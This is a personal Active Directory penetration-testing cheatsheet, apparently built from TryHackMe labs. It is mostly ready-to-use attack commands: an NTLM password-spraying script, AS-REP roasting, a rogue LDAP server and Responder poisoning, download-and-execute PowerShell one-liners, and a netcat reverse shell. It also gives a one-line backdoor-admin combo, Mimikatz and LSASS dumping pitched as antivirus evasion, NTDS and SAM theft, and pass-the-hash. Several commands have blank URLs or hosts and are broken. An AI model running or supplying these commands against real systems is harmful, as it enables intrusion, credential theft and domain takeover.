Active Directory – Notes, Methodology, Cheatsheet

These are my notes from the Active Directory networks at TryHackMe, as well as notes from other sources.

Inspo: E’s methodology,,,

Work in progress


LOLBAS – Living off the land

WADComs – Very useful cheatsheet


GitHub – DanMcInerney/icebreaker: Gets plaintext Active Directory credentials if you’re on the internal network but outside the AD environment

AD Methodology

  • First step is to find valid credentials, that could either be a username, hashes or if lucky, username and password.
  • Once you have access to target, enumerate AD. Relations between users, groups. Use BloodHound etc.
  • Escalate privilege on local machine to local administrator
  • Extract hashes if possile.
  • Escalate to domain admin.

Mindmap –

Finding valid credentials

Pentest network

See methodology

  • Try exploit vulnerabilities on open ports
  • Try extract credentials from open ports

Enumerate DNS

gobuster dns -d domain.local -t 25 -w /opt/Seclist/Discovery/DNS/subdomain-top2000.txt

OSINT and Phishing

  • Check public forums like Stack Overflow
  • Check public repo on github
  • Breached credentials. (Dehashed, intelx etc)
  • Google dorking

Null and Guest access on SMB services

enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>

smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>

smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //

NTLM Relay attack

NTLM relay is a technique that allows an attacker to intercept and forward NTLM authentication requests between a client and a server. The attacker can use this technique to gain access to the server or perform other actions on behalf of the client. For example, an attacker can use NTLM relay to dump the hashes of all domain users from a domain controller using DCSYNC.

Example: an attacker could use PetitPotam to force a domain controller to authenticate to a malicious server and then relay the NTLM request to another domain controller and perform a DCSync operation, which allows the attacker to dump all the password hashes from Active Directory. This could result in a complete takeover of the Windows domain.
 This module performs the SMB Relay attacks originally discovered by cDc extended to many target protocols (SMB, MSSQL, LDAP, etc).
   It receives a list of targets and for every connection received it will choose the next target and try to relay the credentials. Also, if specified, it will first to try authenticate against the client connecting to us.
 It is implemented by invoking a SMB and HTTP Server

lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on. lsarelayx will relay any incoming authentication request which includes SMB.
PetitPotam is a technique that can be used to perform NTLM relay attacks against Windows servers, including domain controllers.
Good explanation of NTLM relay.

NTLM Authenticated Services

New Technology LAN Manager (NTLM) is the suite of security protocols used to authenticate users’ identities in AD.

def password_spray(self, password, url):
    print ("[*] Starting passwords spray attack using the following password: " + password)
    #Reset valid credential counter
    count = 0
    #Iterate through all of the possible usernames
    for user in self.users:
        #Make a request to the website and attempt Windows Authentication
        response = requests.get(url, auth=HttpNtlmAuth(self.fqdn + "\\" + user, password))
        #Read status code of response to determine if authentication was successful
        if (response.status_code == self.HTTP_AUTH_SUCCEED_CODE):
            print ("[+] Valid credential pair found! Username: " + user + " Password: " + password)
            count += 1
        if (self.verbose):
            if (response.status_code == self.HTTP_AUTH_FAILED_CODE):
                print ("[-] Failed login with Username: " + user)
    print ("[*] Password spray attack completed, " + str(count) + " valid credential pairs found")
python -u <userfile> -f <fqdn> -p <password> -a <attackurl>

<userfile> - Textfile containing our usernames - "usernames.txt"
<fqdn> - Fully qualified domain name associated with the organisation that we are attacking - ""
<password> - The password we want to use for our spraying attack - "Changeme123"
<attackurl> - The URL of the application that supports Windows Authentication - ""


See cheatsheet LDAP

LDAP authentication is similar to NTLM authentication. However, with LDAP authentication, the application directly verifies the user’s credentials. The application has a pair of AD credentials that it can use first to query LDAP and then verify the AD user’s credentials.

nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>
ldapsearch -x -h -b "dc=hutch,dc=offsec" > ldap.searchquery

LDAP Pass-back Attack

In an LDAP Pass-back attack, we can modify this IP to our IP and then test the LDAP configuration, which will force the device to attempt LDAP authentication to our rogue device.

# Setup rogue LDAP server 
sudo apt-get update && sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd

# Configure the rogue LDAP server 
sudo dpkg-reconfigure -p low slapd

# Make rogue LDAP server vulnerable by downgrading the supporten authentication mechanism. Add this to a file called "olcSalSecProps.ldif":

dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred

olcSaslSecProps: Specifies the SASL security properties
noanonymous: Disables mechanisms that support anonymous login
minssf: Specifies the minimum acceptable security strength with 0, meaning no protection.

# Now we can use the ldif file to patch our LDAP server using the following:
sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart

# Verify rogue LDAP servers config 
[kali@kali]$ ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms
supportedSASLMechanisms: PLAIN
supportedSASLMechanisms: LOGIN
# Capturing LDAP Credentials. We will have to trigger the authenticaiton to go to our rogue LDAP server. 
sudo tcpdump -SX -i eth0 tcp port 389

Authentication Relays

Responder allows us to perform Man-in-the-Middle attacks by poisoning the responses during NetNTLM authentication, tricking the client into talking to you instead of the actual server they wanted to connect to. On a real LAN, Responder will attempt to poison any  Link-Local Multicast Name Resolution (LLMNR),  NetBIOS Name Servier (NBT-NS), and Web Proxy Auto-Discovery (WPAD) requests that are detected.

# Start responder 
sudo responder -I tun0 

# Downgrade NTLM authentication when possible. Allow capture NTLMv1 challenge and response. 
#Remember that in order to crack NTLMv1 you need to set Responder challenge to "1122334455667788"
responder -I <Iface> --lm --disable-ess #Downgrade NTLM authntication if possible and force ESS downgrade

Microsoft Deployment Toolkit

Microsoft Deployment Toolkit (MDT) is a Microsoft service that assists with automating the deployment of Microsoft Operating Systems (OS).

Import-Module .\PowerPXE.ps1
$BCDFile = "conf.bcd"
Get-WimFile -bcdFile $BCDFile

Get-FindCredentials -WimFile pxeboot.wim

Difference between ASREProast and Kerberoasting

AS_REP Roasting is taking place during the initial authentication procedure within Kerberos. It´s abusing the fact, that for accounts with the option Do not require Kerberos preauthentication set, there is no need to send the (normally required) encrypted timestamp (with the users password hash) at the very beginning. Thus everyone on the network who knows the name of an affected account may ask the KDC to authenticate as that user and in return fetch a AS_REP response which partly is encrypted with the AS_REP roastable account´s password hash. Once obtained, an attacker can try to offline crack the hash and fetch the cleartext credentials.

Kerberoasting aims at asking for service tickets related to services on the network where the SPNs are tied to user accounts, rather than computer accounts. The background here is that if a person creates a user he will choose the password most likely according to human standards i.e. a phrase, a word mixed with numbers, etc. If that password is weakly chosen, then it is possible to crack the hash and get the cleartext credentials.
During the process of asking to access a service on the network, the TGS will send a data package that contains a service ticket which is encrypted with the service-account´s password hash, that again like in the AS_REP roasting attack can be cracked offline.

User enumeration

When an invalid username is requested the server will respond using the Kerberos error code KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN

./kerbrute_linux_amd64 userenum -d usernames.txt

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN'" <IP>

Nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='<domain>',userdb=/root/Desktop/usernames.txt <IP>

msf> use auxiliary/gather/kerberos_enumusers

crackmapexec smb  -u '' -p '' --users | awk '{print $4}' | uniq

Knowing a userame(s)


The ASREPRoast attack looks for users without Kerberos pre-authentication required attribute (DONT_REQ_PREAUTH).

That means that anyone can send an AS_REQ request to the DC on behalf of any of those users, and receive an AS_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline.

Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView

# Linux
# Try all the usernames in usernames.txt
python jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
# Use domain creds to extract targets and target them
python jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast

# Windows 
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (

# Cracking the hashes
john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt 

# Force preauth not required for a user where you have GenericAll permissions (or permissions to write properties):
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose

Password spraying

Lists of common usernames could also be useful:

# Need valid creds
crackmapexec <IP> -u 'user' -p 'password' --pass-pol

enum4linx -u 'username' -p 'password' -P <IP>

(Get-DomainPolicy)."SystemAccess" #From powerview
# To prevent lockout it's best not to try with more than 5/7 passwords per account. -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>

crackmapexec smb <IP> -u users.txt -p passwords.txt

./kerbrute_linux_amd64 passwordspray -d domain_users.txt Password123

./kerbrute_linux_amd64 bruteuser -d passwords.lst thoffman

# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>

# Crack hash
john --wordlist=passwords_kerb.txt hashes.asreproast

hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt 

# Powershell passwordspraying script

Import-Module MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020

Enumerating Active Directory with valid credentials/session

Shell with credentials

If you have valid credentials you could try to get a shell.

To get shell with Administrator user and not with NT Authority\system, use WinExec or Evil-Winrm

# CrackMapExec 
# Validate if credentials found is valide, and which protocol you can use to get a shell. {ssh,smb,mssql,winrm,ldap} Notice Pwn3d! with creds enox:california
crackmapexec winrm -u enox -p california
WINRM 5985   NONE             [+] None\enox:california (Pwn3d!)

# Can also be used to brute force 
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes

# SSH - Port 22 
# If SSH is open try to SSH to target 
ssh user@target [-i id_rsa] 

# WinRM - Port 5895, 5896 
# If port 5985,5986 is open, try Evil-Winrm
gem install evil-winrm
evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.'  -i <IP>/<Domain>
evil-winrm -u Administrator -H 'Use_hash_here'  -i <IP>/<Domain>
winrs.exe -u:Administrator -p:Mypass123 -r:target cmd

# PTH-winexe
Basic syntax w/ credentials.
winexe -U <domain/username>%<password> //<targetIP> cmd.exe
Basic syntax w/ NTLM hash (pass the hash technique).
pth-winexe -U <domain/username>%<hash> //<targetIP> cmd.exe

# RDP - Port 3389 
xrdp target
rdesktop target 

# PSExec & SMBExec - Port 445
# Both options will create a new service (using \pipe\svcctl via SMB) in the victim machine and use it to execute something (psexec will upload an executable file to ADMIN$ share and smbexec will point to cmd.exe/powershell.exe and put in the arguments the payload --file-less technique--).
# If no password is provided, it will be prompted
./ [[domain/]username[:password]@]<targetName or address>
./ -hashes <LM:NT> administrator@ #Pass-the-Hash
psexec \\ -u Administrator -p 123456Ww
psexec \\ -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash

# PSExec with Powershel
$username = 'Administrator';
$password = 'Mypass123';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force; 
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;

Enter-PSSession -Computername TARGET -Credential $credential
# Powershell also includes the Invoke-Command cmdlet, which runs ScriptBlocks remotely via WinRM. Credentials must be passed through a PSCredential object as well:

Invoke-Command -Computername TARGET -Credential $credential -ScriptBlock {whoami}

# Remotely creat services using sc - port 135,445,139
sc.exe \\TARGET create AGservice binPath= "net user test test123 /add" start= auto
sc.exe \\TARGET start AGservice 

# Stop or delete service
sc.exe \\TARGET stop AGservice 
sc.exe \\TARGET delete AGservice

# Creating scheduled tasks remotely
schtasks /s TARGET /RU "SYSTEM" /create /tn "AGtask1" /tr "<command/payload to execute>" /sc ONCE /sd 01/01/1970 /st 00:00
schtasks /s TARGET /run /TN "AGtask1"

# /sc - Task will only run once. Starting date and time dosent matter because of this. 

Shell – Changing user if you have a shell

# If you have a shell as a user, most likely runas command wont work because we cant type our password when prompted with typing our password. There are some tools you can try. 

# Invoke-RunasCs.exe 
.\RunasCs_net4.exe svc_mssql trustno1 cmd.exe -r

# RunAsUser.exe 
RunAsUser.exe -u superadmin -p funnyhtb -f c:\users\public\nc.exe -a ' 9001 -e cmd.exe'

# Try writing a ps1 script to use runas command 
# cat runme.ps1                     
$secpasswd = ConvertTo-SecureString "trustno1" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("svc_msssql", $secpasswd)
$computer = "access.offsec"
[System.Diagnostics.Process]::Start("C:\xampp\htdocs\uploads\shell.exe","", $mycreds.Username, $mycreds.Password, $computer)

Basic commands



echo %USERDOMAIN% #Get domain name
echo %USERDNSDOMAIN% #Get domain name
echo %logonserver% #Get name of the domain controller
set logonserver #Get name of the domain controller
set log #Get name of the domain controller
net groups /domain #List of domain groups
net group "domain computers" /domain #List of PCs connected to the domain
net view /domain #Lis of PCs of the domain
nltest /dclist:<DOMAIN> #List domain controllers
net group "Domain Controllers" /domain #List PC accounts of domains controllers
net group "Domain Admins" /domain #List users with domain admin privileges
net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the grup "Domain Admins" is included here)
net user /domain #List all users of the domain
net user <ACCOUNT_NAME> /domain #Get information about that user
net accounts /domain #Password and lockout policy
nltest /domain_trust #Mapping of the trust relationships.

whoami /all #All info about me, take a look at the enabled tokens
whoami /priv #Show only privileges
net users #All users
dir /b /ad "C:\Users"
net user %username% #Info about a user (me)
net accounts #Information about password requirements
qwinsta #Anyone else logged in?
net user /add [username] [password] #Create user

#Lauch new cmd.exe with new creds (to impersonate in network)
runas /netonly /user<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted

#Check current logon session as administrator using logonsessions from sysinternals

net localgroup #All available groups
net localgroup Administrators #Info about a group (admins)
net localgroup administrators [username] /add #Add user to administrators

net group /domain #Info about domain groups
net group /domain <domain_group_name> #Users that belongs to the group

# Add domain user and put them in Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN

# Add local user and put them local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD

# Add user to insteresting groups:
net localgroup "Remote Desktop Users" UserLoginName  /add
net localgroup "Debugger users" UserLoginName /add
net localgroup "Power users" UserLoginName /add

netsh firewall show state # FW info, open ports
netsh advfirewall firewall show rule name=all
netsh firewall show config # FW info
Netsh Advfirewall show allprofiles

NetSh Advfirewall set allprofiles state off  #Turn Off
NetSh Advfirewall set allprofiles state on  #Trun On
netsh firewall set opmode disable #Turn Off

::How to open ports
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop" 

::Enable Remote Desktop
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
::netsh firewall set service remotedesktop enable #I found that this line is not needed
::sc config TermService start= auto #I found that this line is not needed
::net start Termservice #I found that this line is not needed

::Enable Remote assistance:
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable

::Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable

::Connect to RDP (using hash or password)
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:



# Default PowerShell locations
# Basic PS commands to start 
Get-Help * #List everything loaded
Get-Help process #List everything containing "process"
Get-Help Get-Item -Full #Get full helpabout a topic
Get-Help Get-Item -Examples #List examples
Import-Module <modulepath>
Get-Command -Module <modulename>

# Download and Execute 
powershell "IEX(New-Object Net.WebClient).downloadString('')"

echo IEX(New-Object Net.WebClient).DownloadString('') | powershell -noprofile - #From cmd download and execute

powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('')|iex"
iex (iwr '') #From PSv3

$h=New-Object -ComObject Msxml2.XMLHTTP;$'GET','',$false);$h.send();iex $h.responseText
$wr = [System.NET.WebRequest]::Create("") $r = $wr.GetResponse() IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd(
# Download and Exectute in background with AMSI Bypass 


# Using Base64 from Linux 
echo -n "IEX(New-Object Net.WebClient).downloadString('')" | iconv -t UTF-16LE | base64 -w 0
powershell -nop -enc <BASE64_ENCODED_PAYLOAD>

Download file from attacker to target

See my cheatsheet also.

# CMD 

# Bitsadmin.exe
bitsadmin /create 1 bitsadmin /addfile 1 c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1

# CertReq.exe
CertReq -Post -config c:\windows\win.ini output.txt

# Certutil.exe
certutil.exe -urlcache -split -f "" s.exe

# CrackMapExec 
crackmapexec smb -u user -p pass --put-file /tmp/whoami.txt \\Windows\\Temp\\whoami.txt

# Desktopimgdownldr.exe
set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl: /eventName:desktopimgdownldr

# Diantz.exe
diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\

# Esentutl.exe
esentutl.exe /y \\\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o

# Expand.exe
expand \\webdav\folder\file.bat c:\ADS\file.bat

# Extrac32.exe
extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt

# Findstr.exe
findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe

# Ftp.exe
cmd.exe /c "@echo open 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"

# GfxDownloadWrapper.exe
C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"

# Hh.exe
HH.exe http://some.url/script.ps1

# Ieexec.exe
ieexec.exe http://x.x.x.x:8080/bypass.exe

# Makecab.exe
makecab \\webdavserver\webdav\file.exe C:\Folder\

# MpCmdRun.exe
MpCmdRun.exe -DownloadFile -url <URL> -path <path> //Windows Defender executable

# Replace.exe
replace.exe \\\foo\bar.exe c:\outdir /A

# Excel.exe

# Powerpnt.exe
Powerpnt.exe ""

# Squirrel.exe
squirrel.exe --download [url to package]

# Update.exe
Update.exe --download [url to package]

# Winword.exe
winword.exe ""

# Wsl.exe
wsl.exe --exec bash -c 'cat < /dev/tcp/ > binary'

# System.Net.WebClient
(New-Object Net.WebClient).DownloadFile("","C:\Windows\Temp\taskkill.exe")

# Invoke-WebRequest
Invoke-WebRequest "" -OutFile "taskkill.exe"

# Wget
wget "" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"

# BitsTransfer
Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $output
# OR
Start-BitsTransfer -Source $url -Destination $output -Asynchronous

# Base64 Kali & EncodedCommand
kali> echo -n "IEX(New-Object Net.WebClient).downloadString('')" | iconv --to-code UTF-16LE | base64 -w0
PS> powershell -EncodedCommand <Base64>


adPEAS consists of the following enumeration modules:

  • Domain – Searching for basic Active Directory information, like Domain Controllers, Sites und Subnets, Trusts and DCSync rights
  • CA – Searching for basic Enterprise Certificate Authority information, like CA Name, CA Server and Templates
  • Creds – Searching for different kind of credential exposure, like ASREPRoast, Kerberoasting, GroupPolicies, Netlogon scripts, LAPS, gMSA, certain account attributes, e.g. UnixPassword, etc.
  • Delegation – Searching for delegation issues, like ‘Constrained Delegation’, ‘Unconstrained Delegation’ and ‘Resource Based Unconstrained Delegation’, for computer and user accounts
  • Accounts – Searching for high privileged user accounts in predefined groups, account issues like e.g. password not expire
  • Computer – Enumerating Domain Controllers, CA and Exchange server, with the switch -Vulns it checks the systems for EternalBlue, BlueKeep, ZeroLogon and critical Exchange vulnerabilities
  • Bloodhound – Enumerating Active Directory with BloodHound
# Load adPEAS in PowerShell.

Import-Module .\adPEAS.ps1 # Method 1
. .\adPEAS.ps1 # Method 2

gc -raw .\adPEAS.ps1 | iex # Method 3

IEX (New-Object Net.WebClient).DownloadString('') # Method 4


# Start adPEAS with all enumeration modules and enumerate the domain the logged-on user and computer is connected to.

#Start adPEAS with all enumeration modules and enumerate the domain ''.
Invoke-adPEAS -Domain ''

# Start adPEAS with all enumeration modules, enumerate the domain '' and use the domain controller '' for almost all enumeration requests.

Invoke-adPEAS -Domain '' -Server ''

# Start adPEAS with all enumeration modules, enumerate the domain '' and use the passed PSCredential object during enumeration.

$SecPassword = ConvertTo-SecureString 'Passw0rd1!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('contoso\johndoe', $SecPassword)
Invoke-adPEAS -Domain '' -Cred $Cred

# Start adPEAS with all enumeration modules, enumerate the domain '' and use the username 'contoso\johndoe' with password 'Passw0rd1!' during enumeration.
Invoke-adPEAS -Domain -Username 'contoso\johndoe' -Password 'Passw0rd1!'


# Ping Castle is a tool designed to assess quickly the Active Directory security level with a methodology based on risk assessment and a maturity framework.

# Simple healthcheck 
./pingcastle.exe --user User1 --password Password1 --server --healthcheck 


BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment.

  1. Run sharphound or to collection data from target
  2. Transfer and import the zip files to bloodhound
  3. Analyze
# Install java
echo "deb stretch-backports main" | sudo tee -a /etc/apt/sources.list.d/stretch-backports.list
sudo apt-get update

# Install neo4j 
wget -O - | sudo apt-key add -
echo 'deb stable 4.0' > /etc/apt/sources.list.d/neo4j.list
sudo apt-get update

apt-get install apt-transport-https
sudo apt-get install neo4j
systemctl stop neo4j

# Start neo4j 
cd /usr/bin
./neo4j console


# Download the latest version of the BloodHound GUI from
./BloodHound.bin --no-sandbox
# Windows 

# For PC joined to domain 
./SharpHound.exe --CollectionMethod All
Invoke-BloodHound -CollectionMethod All

# Execute SharpHound using different creds 
runas /netonly /user:domain\user "powershell.exe -exec bypass"

# Python 
# Need valid creds
python3 -u support -p '#00^BlackKnight' -ns -d blackfield.local -c all -dc dc01.blackfield.local

python3 -c All -d <DOMAIN> -u <USER> -p '<PASSWORD>' -ns <NAMESERVER IP> -dc <DOMAIN CONTROLLER>

# Through proxychains 
proxychains bloodhound-python -u support -p '#00^BlackKnight' -ns -d blackfield.local -c all --dns-tcp

Add Custom Queries to BloodHound
# After adding the custome queries, they will show up under Analysis --> Custom Queries. 

# On Linux, you can simply install the queries using this curl command:

curl -o ~/.config/bloodhound/customqueries.json ""

# On Windows, you can simply install the queries using this PowerShell command:

Invoke-WebRequest -Uri "" -OutFile "$env:USERPROFILE\AppData\Roaming\bloodhound\customqueries.json"

LDAP with credentials

# Look in the LDAP database, with ldapsearch or AdExplorer.exe to look for credentials in fields userPassword & unixUserPassword, or even for Description

ldapsearch -x -b <search_base> -H <ldap_host> -D <bind_dn> -W
ldapsearch -x -b "dc=devconnected,dc=com" -H ldap://
python -u morph3 -p morph3 -d evil.corp –dc-ip
python -d -l -u Administrator -p P@ssw0rd

Group Managed Service Accounts – gMSA

# If service account exists on target, enumerate gMSA. 
# Group Managed Service Accounts provide a higher security option for non-interactive applications, services, processes, or tasks that run automatically but need a security credential.
# Example 
Import-Module ActiveDirectory
Get-ADPrincipalGroupMembership svc_apache$ | select name

# Check if your user is allowed to retrieve managed passwords
Get-ADServiceAccount -Identity 'svc_apache$' -Properties * | Select PrincipalsAllowedToRetrieveManagedPassword

# Repo for reading gMSA passwords
.\GMSAPasswordReader.exe --accountname svc_apache

# Now either try to crack the hash or pass the hash using any of the techniques in this blogpost. 

Local Privilege Escalation

If you have valid credentials, try to escalate to local administrator in order to be able to dump password hashed.

Checklist and tools to check for PrivEsc

# Checklist for local windows privilege escalation

# Notes

# Use WinPEASS
kali> peass 

# PowerView.ps1
Import-Module powerview.ps1

# PowerUp.ps1 
. .\powerup.ps1

# seatbelt
# Run all checks
Seatbelt.exe -group=all -full

# Run from within CMD shell and write out to screen.
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1

Abusing GPO Permission

# See PG Vault writeup

# If you have write permission to a GPO, try using SharpGPOAbuse 
# Precompiled exe is located here

# See github for more commands 
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"

Lateral movement with privileged creds/session

Windows Credentials

CheatSheet II – Advanced – BOOK_GHANIM

Hash extraction

Dump all the hashes in memory and locally.

If mimikatz.exe dont work on reverse shell, try generating a msfvenom with -f psh-cmd and try again. Mimikatz should work now. It does not work with nishang invoke-powershelltcp for some reason.

# Credentials Mimikatz 
# Elevate Privileges to extract the credentials
privilege::debug # This should give an error if you are Admin, but if it does, check if the SeDebugPrivilege was removed from Admins
#Extract from lsass (memory)
#Extract from lsass (service)
lsadump::lsa /inject
#Extract from SAM
#One liner
mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "exit"

# Invoke-Mimikatz 
IEX (New-Object System.Net.Webclient).DownloadString('')
Invoke-Mimikatz -DumpCreds #Dump creds from memory
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "exit"'

# Meterpreter 
#Credentials from SAM

#Using kiwi module
load kiwi
kiwi_cmd "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam"

#Using Mimikatz module
load mimikatz
mimikatz_command -f "sekurlsa::logonpasswords"
mimikatz_command -f "lsadump::lsa /inject"
mimikatz_command -f "lsadump::sam"

# Bypass Anti-Virus 
# Procdump from SysInternals is a legitimate Microsoft tool, and is not detected by Defender. Use this tool to dump lsass process, download the dump and extract creds locally from the dump

C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
#Remote, mount which contains procdump.exe
net use Z:
Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp

# Extract creds from dump
//Load the dump
mimikatz # sekurlsa::minidump lsass.dmp
//Extract credentials
mimikatz # sekurlsa::logonPasswords

# Automatically done with SprayKatz 
./ -u H4x0r -p L0c4L4dm1n -t

# Dumping lsass with comsvcs.dll
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <lsass pid> lsass.dmp full

# Dumping lsass with Task Manager

# Dumping lsass with procdump 
Get-Process -Name LSASS
.\procdump.exe -ma 608 lsass.dmp

# CrackMapExec 

# Dump SAM hashes
cme smb -u UserNAme -p 'PASSWORDHERE' --sam
# Dump LSA secrets
cme smb -u UserNAme -p 'PASSWORDHERE' --lsa
# Dump the NTDS.dit from target DC
cme smb -u UserNAme -p 'PASSWORDHERE' --ntds
cme smb -u UserNAme -p 'PASSWORDHERE' --ntds vss
# Dump the NTDS.dit password history from target DC
cme smb -u UserNAme -p 'PASSWORDHERE' --ntds-history
# Show the pwdLastSet attribute for each NTDS.dit account
cme smb -u UserNAme -p 'PASSWORDHERE' --ntds-pwdLastSet

# Stealing SAM & SYSTEM
# This files should be located in C:\windows\system32\config\SAM and C:\windows\system32\config\SYSTEM. But you cannot just copy them in a regular way because they protected.

# From registry
# Easiest method 
reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security

# Download to attacker 
samdump2 SYSTEM SAM
impacket-secretsdump -sam sam -security security -system system LOCAL

# Invoke-NinjaCopy
# Use PS script to make copy of SAM, SYSTEM and ntds.dit 
Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\sam" -LocalDestination "c:\copy_of_local_sam"

Pass the Hash

Lateral Movement: Pass the Hash Attack

Once you have the hash of the victim, you can use it to impersonate it.

# Mimikatz 
# This will launch a process that will belongs to the users that have launch mimikatz but internally in LSASS the saved credentials are the ones inside the mimikatz parameters. Then, you can access to network resources as if you where that user (similar to the runas /netonly trick but you don't need to know the plain-text password).
# 1
Invoke-Mimikatz -Command '"sekurlsa::pth /user:username /domain:domain.tld /ntlm:NTLMhash /run:powershell.exe"' 

# 2
sekurlsa::pth /user:Administrator /domain:ignite.local /ntlm:32196B56FFE6F45E294117B91A83BF38

# Pass-the-hash from linux 
# Connect via psexec using PTH -hashed LM:NT user@ip
python3 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 administrator@

# Connect to RDP using PTH
xfreerdp /v:VICTIM_IP /u:DOMAIN\\MyUser /pth:NTLM_HASH

# Pass the hash with evil-winrm
evil-winrm -u <username> -H <Hash> -i <IP>

# SMBclient
python -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@

# Crackmapexec
crackmapexec smb -u Administrator -H 32196B56FFE6F45E294117B91A83BF38 -x ipconfig

# rpcdump
python -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@


# PTH toolkit builtin in Kali linux
# smbclinet
pth-smbclient -U test.local/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //$

# wmic
pth-wmic -U test.local/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 // "select Name from Win32_UserAccount"

# rpcclient
